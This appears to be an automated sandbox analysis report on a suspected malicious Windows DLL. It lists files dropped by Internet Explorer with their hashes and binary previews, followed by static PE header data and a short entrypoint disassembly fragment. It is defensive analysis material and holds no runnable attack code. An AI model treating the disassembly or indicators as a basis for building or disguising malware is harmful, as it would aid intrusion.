                                        SHA-512:751D0CB5B1769336E6FA61304A717BD1285D3F08BED99B6163E5397C04437832AEDE9F6BC9259A599F55DE204724F618FA83913D2686C0CE5CCC6B6C42A65E6E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF6E4FBFF28570096B.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):25657
                                        Entropy (8bit):0.31410335955707785
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwY9lwTc9l2j:kBqoxKAuvScS+LFj
                                        MD5:C456225B482DB3D7BAF7989FC2853857
                                        SHA1:A3B38740B0558867C805BF01FC5F266E016DB4B6
                                        SHA-256:F12C151319467F6AEAE159FE419A9DB1EE5F31F445151D6FF2C2797230A5E695
                                        SHA-512:7B927DFD00EAC74540AC1D250EAC3F247E5B1DE4C49AC5422E7EB98AC5FDC50D916092026B6F3C9DFB3818D0E3BF8DFA3A9582885E957B34673E8BAD37B19A16
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF7CE8F48B4B5CE347.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):34825
                                        Entropy (8bit):0.43446532092598117
                                        Encrypted:false
                                        SSDEEP:48:kBqoxKAuvScS+XZkYkpklIklOWlYYYh6LXhut2n:kBqoxKAuvScS+XZbS5DjYr4g
                                        MD5:968527B6B5C0E494EE209D6FC70D266F
                                        SHA1:A6888E8767D00B443F283E983D7C5DA10AB34D83
                                        SHA-256:C48B25714D2627BA627FF01182A7751A4E90B8C1BF81C7F1849FDE2FEE1B7342
                                        SHA-512:7E41E7B2D70EB3C9D6115028C1DDF0FB9702E6F66D4398D335A0487ACFA686E67E78467E0E231E75BE918D4E27E31BD29681ECCD29ACB6E0DFDD242C0B14631B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF89E94B88C3122357.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39673
                                        Entropy (8bit):0.5799935740111964
                                        Encrypted:false
                                        SSDEEP:48:kBqoxKAuvScS+1W1Q1K1j1fI1fynf3t4QD2wwnf3t4QD2wknf3t4QD2w9:kBqoxKAuvScS+4+UluUPt4JPt4pPt4u
                                        MD5:CF9CCDCC15F4BB8523A34725087D5B81
                                        SHA1:5E1400E8E8C3573144B859CC73500D13F10E4B14
                                        SHA-256:BFDBDB4B8A79F03D917D5657B44336C507F95E89F363975714188657607C53EB
                                        SHA-512:1373E5ECAC2BCDB9ED35D5F30B4B60F103D56CE1C6AA518D87782987C49D1232B877B75F2FC2FEC16003DA396F06F561FAE4CB07833322D8D04E0668D1F45CD2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF9E3497B6790C0EC4.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29745
                                        Entropy (8bit):0.2920107282763179
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAC9laAC9lrz:kBqoxxJhHWSVSEabeQ2y
                                        MD5:CE909A43525B3843C907DCBE55E9D7DD
                                        SHA1:8B6E53CCBAAB132FF8100ECB696282F011402047
                                        SHA-256:540A8B39EAF1EF9CF341697FC4CDABBEBDED17B16321398C539639FD17EE1602
                                        SHA-512:027F1DF5288441E3BFF63ABABD90521E2A72DC20FFAC545E0F180483761229D13254375ADA525D3C5155C1BAC6602117B24617A160C4B9D21C30721B9DF17446
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFA7967BC6A9057EC8.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39729
                                        Entropy (8bit):0.5904464620891627
                                        Encrypted:false
                                        SSDEEP:96:kBqoxKAuvScS+ouk1eI0+GGyB0+GGyd0+GGyC:kBqoxKAuqR+ouk1eIRGzBRGzdRGzC
                                        MD5:2260A0B75D19B9D8744AB7FF70ED1002
                                        SHA1:B1DCD0C3442117CBE1BBD1988C2E8F46DA94F066
                                        SHA-256:7DEE20B21DBA0D2A066434B1CDD9E33BF95E69A54CDBF8888B26FECF35B5E2E8
                                        SHA-512:F2F86B173628588C0CACD3A5CBC89BA816C6543B0F94F68D0560514D2DB575A63ECF5498C98AD68C8C5A475948AB9B57172EAB7C499102290E0F47B61E5C1C65
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFB1A75A66147A77CF.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):25657
                                        Entropy (8bit):0.3142129947050807
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwu9lwpc9l2Sy:kBqoxKAuvScS+B/x
                                        MD5:BBB8E4D3C1E58DA8ED5EE015CB44DC44
                                        SHA1:F745127B6B06E79EF07344326A6C4D046582983A
                                        SHA-256:0F6BD972F8B8C0DC301F90CB2457F562657C34EC840FCAAFAAD5616CB641D8BD
                                        SHA-512:A13BD7F0A825B763563F321CC9D37BB138B7FECB10057206A8EE32CC7EC635E738A2FA9D5D3E659389CD22059E9DA04B0E57AA528D4627D8341E0A53318DF477
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFC075B193E8936012.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39809
                                        Entropy (8bit):0.605449517339683
                                        Encrypted:false
                                        SSDEEP:96:kBqoxKAuvScS++4y7oGPYDCNPYDCGPYDCm:kBqoxKAuqR++4y7oGQmNQmGQmm
                                        MD5:1329E524BF9F182F7C5B305E6B37E591
                                        SHA1:E123571478A2BB4B48A73E50A0CD98EFAD9777BF
                                        SHA-256:A7688932EB7BCC6FA3E021FE7BB122384F69A3AF2B4565EDED05E574B3DF10CA
                                        SHA-512:722EC51FFA339B413F21C6703424DDADF6ACA59DDF7E6ADA16D317948EB3EFAECBDB50B9468A36E746FCE2F722BEBEB135D23282267B958D42EC6733D3EEC492
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFC73AC009E2BBD270.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39681
                                        Entropy (8bit):0.5802800074311916
                                        Encrypted:false
                                        SSDEEP:96:kBqoxKAuvScS+FrJ4bJY+hfrFY+hfrZY+hfr+:kBqoxKAuqR+FrJ4bJDFDZD+
                                        MD5:D32EE231CA4889CAEFCE6886D23D5EBF
                                        SHA1:663C6274AF470C5D9B1F6DC7427BB6022E46E4BE
                                        SHA-256:0FB595B1A5BFAAB25A386A457CFEE0FDCA93C6DE812A51161A9A9E0D27E447C1
                                        SHA-512:A99AC42C149113743DF09161DA34BEE9A7217E9C95B5E8B5E01816CC5CEE0301FCBCD3B8B45874249B3A67C45833AC04FC94F7BB62A1FC680C2A134711AD1C36
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFCC71BE5E716F720A.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):34405
                                        Entropy (8bit):4.029028348951458
                                        Encrypted:false
                                        SSDEEP:192:kBqoIb9zL3n8VonwA6Ch5Xkqknkvk76DODQDbDlDGDerDeADe6DeCDewD5EI55Iy:kBqoIb9vdh3WDVdAh0q9
                                        MD5:782EBEE920272416343FF3D73235ED63
                                        SHA1:1ADADB5E17E15D12A95ADA250FE485FEEE534473
                                        SHA-256:D2F5AD567CEE04CD6A294BEA131E86790F41C4B438A445372C31AA9B0A2023FA
                                        SHA-512:FD761E18D7C74E144E0834E2AA597812745420693A8EDA1A6DF8F009C5796458161496A2C0ABB2DE36E9D387FDDFE877F1592197599727D293BE7159E7360401
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFD3D6CAB802D0CCCD.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):25657
                                        Entropy (8bit):0.314037824825452
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwX9lwwc9l2G:kBqoxKAuvScS+AGG
                                        MD5:9E927A9CCD53149E8C7B2ED2C30E998A
                                        SHA1:69666E9173BD9FE8B7559968024A3B4934A479D6
                                        SHA-256:13C6DB45020108F4EA61DD30B00063C01B652B122B3DE79BC13BAAB41FDCE8A8
                                        SHA-512:56290AEDF21C2172DF95F68E8A40AF1AF97778F3B8CB73015AC8A54BDA03F2A382690D1F38CE03E46CEEE8367779508D93D95A3EF73ADC756FA0C4589CED1DDA
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFE1BE5ABC77A13206.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39713
                                        Entropy (8bit):0.5834692308611003
                                        Encrypted:false
                                        SSDEEP:96:kBqoxKAuvScS+lilElOlnlUlS3GrlI7BA/du3GrlI7BA/dW3GrlI7BA/dv:kBqoxKAuqR+IOEV+w2i7Uu2i7UW2i7Uv
                                        MD5:3A54380A47F7C76B88B127533790F6DD
                                        SHA1:DB3C553D7113BE5724C1EE7B1365E51C444DBB83
                                        SHA-256:C262BAC8F12F2E3E93BDD655279F31C8C189B8DCB54DF8E1609F9A9449E2D9BB
                                        SHA-512:825DF4D5AEE2B24730E7C3FD059AE6F4738A4BAA0D1E3091AFC0064C96790EC4563B74664DFD1B084122E1413A074D7A612CDF7A2023E39F805B3ECE52D7292A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFE6B7C6A48405F49F.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):25657
                                        Entropy (8bit):0.31421299470508074
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwlp9lwlSc9l2lg:kBqoxKAuvScS+lKlslg
                                        MD5:0720C8977C766E59A550CE403F022B65
                                        SHA1:EBE3A7D2167C531F91B9FAE9308E6B9678050BC8
                                        SHA-256:1AF6F2FE2A17FB1C6EF269E4D2D4793FC3C2AA203889BCCCB98CB1F422E1D25B
                                        SHA-512:CD2EECE2DD857952817982DDACD4AD4E22EF51AD6FDBCD5E9C7245BA6118535CCDA29774B7ECFE3CD92AA1E0BF46BA3A5C1EAA9EA233A0C7A90C108E62F68A8E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFEAC6A4A8E15E0827.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39785
                                        Entropy (8bit):0.6008413991535659
                                        Encrypted:false
                                        SSDEEP:96:kBqoxKAuvScS+djBgDl33Vya33VyW33Vy3:kBqoxKAuqR+djBgDl3FN3F93FC
                                        MD5:9D2C78564EFCB7095F40B69CD408E4B8
                                        SHA1:F60D6FFB70478C05339EFC359E1A9E9CF683B92D
                                        SHA-256:D480D7E9720CED1A2BD78B1ED37509556FE0CA74DE826FD3C0A910544902A628
                                        SHA-512:B462F01202CCED26B89EB2627FD77EA3D6F830E70B88BED5CEAFBF10899F3266F8CAB9AE6C8211C7414C0AB76E1175A926435C967FBA586E915AB655293E7D2B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFF4DCF86439985E24.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):360170
                                        Entropy (8bit):3.3037967258062184
                                        Encrypted:false
                                        SSDEEP:3072:dZ/2Bfcdmu5kgTzGtUZ/2Bfc+mu5kgTzGtTZ/2Bfcdmu5kgTzGtYZ/2Bfc+mu5kn:Ej9X
                                        MD5:C432DBB58C345DC7E1FF1E5368331B90
                                        SHA1:35BAD100C58E6E82E0646A964F1F31A284A7E5BE
                                        SHA-256:8864EF06CE6C7188FAE62F7A69687CFA90A7228E9AA714329909F7D637310F99
                                        SHA-512:C03E0771275B77EC65A2CFDC01119CE8AB15872B2573CCFE2F79CE18308B058833CD440AB19876E59CD6C0892A8733437BCC074A5C99F8027FAB02C2F6EDFA20
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFF8C29B41D0333340.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29989
                                        Entropy (8bit):0.3300716355381773
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwY9lwTc9l2u/9l2m9lq:kBqoxKAuvScS+LFu+bKy
                                        MD5:8EF6E3E282D3DB4EF627A0D06977A08F
                                        SHA1:D888834FBFFBEE3D0E869998512681BF5784577E
                                        SHA-256:CCA7C3C50A1C5F933532E9DF75B4B3F13C711096F9ECB0FC4CF753E97ED976B3
                                        SHA-512:DB74043BB786D64EE5D5F94D10493BD6D010D72450F026BECA87B48245FA04B4575EE47C373EEFAA23C6C4E7AC7253356F07F53D89340B2881E5F26478F0D9EB
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFFF4B8C6476358DC0.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29989
                                        Entropy (8bit):0.33092728525249876
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw29lwBc9l2A/9l2o9l0:kBqoxKAuvScS+5XA+pIy
                                        MD5:F5B646DF1A45E238C6984EFC961F766A
                                        SHA1:26B90B1B1859E4B7946C2F256E3DDFF739882A67
                                        SHA-256:9EB88E791A2E776E2CE7FA209820E1E7D8ABB9B5B6AC9E7DB433B4F01F2F0FA5
                                        SHA-512:A9A9838147B1963CD63A15041F8690853453A7EA15D8605FBE21C7CAA6467BF5C3AABE11BE1131718191EE1D3B785CA14CDAB85B395F8D8E003B102817A0A29E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms (copy)
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5149
                                        Entropy (8bit):3.181971138323255
                                        Encrypted:false
                                        SSDEEP:48:cdi4PjIPC9GrIoSAsASFPdi4PjIPh683GrIoSAczcdi4PjIPx9GrIoSAV1H:IPjp9SyAJmPjy3SyADPj69SyAf
                                        MD5:3B3608B7EF553C5524A67C009EF22A08
                                        SHA1:09480675F1A2CFCB2429DA78DD33C73BCB079954
                                        SHA-256:DAC736E995D36B35CA19ACDEC04480E5D7E2F453D6CE88827835FECA06512B47
                                        SHA-512:B23CDE6CA3D58B9DB3F96F04214E5A93E1EE35E0B3F1207C72FAF69A25901A8E9683CEF1870AF9A609E420F602EA0EE4DBA12BB1E4C8587E6FD137927A41893B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ...................................FL..................F.@.. .....@.>....{mYr.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q\u..PROGRA~1..t......L.*S'.....E...............J......~..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*S0...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*S/......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............z.?.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J5UJVFQ4YINQKL7HOEIX.temp
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5149
                                        Entropy (8bit):3.181971138323255
                                        Encrypted:false
                                        SSDEEP:48:cdi4PjIPC9GrIoSAsASFPdi4PjIPh683GrIoSAczcdi4PjIPx9GrIoSAV1H:IPjp9SyAJmPjy3SyADPj69SyAf
                                        MD5:3B3608B7EF553C5524A67C009EF22A08
                                        SHA1:09480675F1A2CFCB2429DA78DD33C73BCB079954
                                        SHA-256:DAC736E995D36B35CA19ACDEC04480E5D7E2F453D6CE88827835FECA06512B47
                                        SHA-512:B23CDE6CA3D58B9DB3F96F04214E5A93E1EE35E0B3F1207C72FAF69A25901A8E9683CEF1870AF9A609E420F602EA0EE4DBA12BB1E4C8587E6FD137927A41893B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ...................................FL..................F.@.. .....@.>....{mYr.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q\u..PROGRA~1..t......L.*S'.....E...............J......~..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*S0...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*S/......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............z.?.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UEENZ8WXGL39Z9ZV0CBQ.temp
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5149
                                        Entropy (8bit):3.181971138323255
                                        Encrypted:false
                                        SSDEEP:48:cdi4PjIPC9GrIoSAsASFPdi4PjIPh683GrIoSAczcdi4PjIPx9GrIoSAV1H:IPjp9SyAJmPjy3SyADPj69SyAf
                                        MD5:3B3608B7EF553C5524A67C009EF22A08
                                        SHA1:09480675F1A2CFCB2429DA78DD33C73BCB079954
                                        SHA-256:DAC736E995D36B35CA19ACDEC04480E5D7E2F453D6CE88827835FECA06512B47
                                        SHA-512:B23CDE6CA3D58B9DB3F96F04214E5A93E1EE35E0B3F1207C72FAF69A25901A8E9683CEF1870AF9A609E420F602EA0EE4DBA12BB1E4C8587E6FD137927A41893B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ...................................FL..................F.@.. .....@.>....{mYr.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q\u..PROGRA~1..t......L.*S'.....E...............J......~..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*S0...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*S/......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............z.?.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                        Static File Info

                                        General

                                        File type:MS-DOS executable, MZ for MS-DOS
                                        Entropy (8bit):6.251166232775736
                                        TrID:
                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                        • DOS Executable Generic (2002/1) 0.20%
                                        • VXD Driver (31/22) 0.00%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:MGrYFpGLQ7.dll
                                        File size:136704
                                        MD5:8c7b2ff105963718fa3c26989e206041
                                        SHA1:831ece0ae6b5e2f373f75352e582abd61b5dd0d7
                                        SHA256:90d8648b2aac0c837286a4c042f02064cfbb12f45b3dc6b00b2beccc7fc35422
                                        SHA512:4a2c9b3ce6d2548660189aa247020c9e19127c57fb50859e36f61ea25c9f84ca792820898fae16fb172e1171e02172081f01c1b9b1946daa1310f6a6097e8f13
                                        SSDEEP:3072:0aWbgDTa51CF1J27oLaPfdWeu0JMNzfpodOCwdAf4:0XMDdJ2hPIeBCj
                                        File Content Preview:MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L..................!................>A............@..................................G..............................e......

                                        File Icon

                                        Icon Hash:74f0e4ecccdce0e4

                                        Static PE Info

                                        General

                                        Entrypoint:0x40413e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:
                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:3c5ce00825859dda51eb5de893c2c46c

                                        Entrypoint Preview

                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 48h
                                        push esi
                                        push 00000022h
                                        push 0040E6E8h
                                        push 00000001h
                                        call dword ptr [0040D144h]
                                        mov dword ptr [ebp-38h], eax
                                        push 00000015h
                                        push dword ptr [00422244h]
                                        push FFFFFF84h
                                        call 00007F012CE2FD6Dh
                                        add esp, 0Ch
                                        push 0000005Dh
                                        push FFFFFFD5h
                                        push 00000005h
                                        push dword ptr [00422244h]
                                        push FFFFFFDBh
                                        push 0000003Ch
                                        push FFFFFFE9h
                                        call 00007F012CE314E8h
                                        push FFFFFFB3h
                                        push dword ptr [00422244h]
                                        push eax
                                        call 00007F012CE2F430h
                                        mov edx, 00000066h
                                        add edx, dword ptr [00422254h]
                                        sub edx, 7Eh
                                        mov dword ptr [ebp-24h], edx
                                        push 0000003Bh
                                        push FFFFFFC3h
                                        push 00000054h
                                        jmp 00007F012CE32D78h
                                        add edi, esi
                                        rol esi, 0Bh
                                        not edx
                                        add edi, esi
                                        add edx, esi
                                        add edx, ebp
                                        lea edi, dword ptr [edx+6B901122h]
                                        int3
                                        push eax
                                        ret
                                        jne 00007F012CE30126h
                                        or edi, eax
                                        mov eax, dword ptr [ecx]
                                        add edi, dword ptr [esp+40h]
                                        add ecx, dword ptr [esp+58h]
                                        mov ecx, edi
                                        ret
                                        call dword ptr [0040A04Ch]
                                        not edi
                                        mov eax, esi
                                        mov dword ptr [esp+24h], ecx
                                        pop ecx
                                        int3
                                        and ecx, edi
                                        mov ecx, ebx
                                        add eax, ebx
                                        mov eax, dword ptr [eax]
                                        mov eax, edi
                                        mov dword ptr [0040D2E4h], eax
                                        mov esi, edi
                                        add edx, esi
                                        test ebx, ebx
                                        add dword ptr [ebp+000000A4h], ecx
                                        add ebx, ebp
                                        int3
                                        push 00000000h

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xa6650xfc.text
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xbdc80x2e4.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b0000x994.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0xd0000x440.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000xb0ac0xb200False0.587671172753data6.63369052343IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata0xd0000x4400x600False0.302734375DOS executable (COM, 0x8C-variant)2.79332490305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
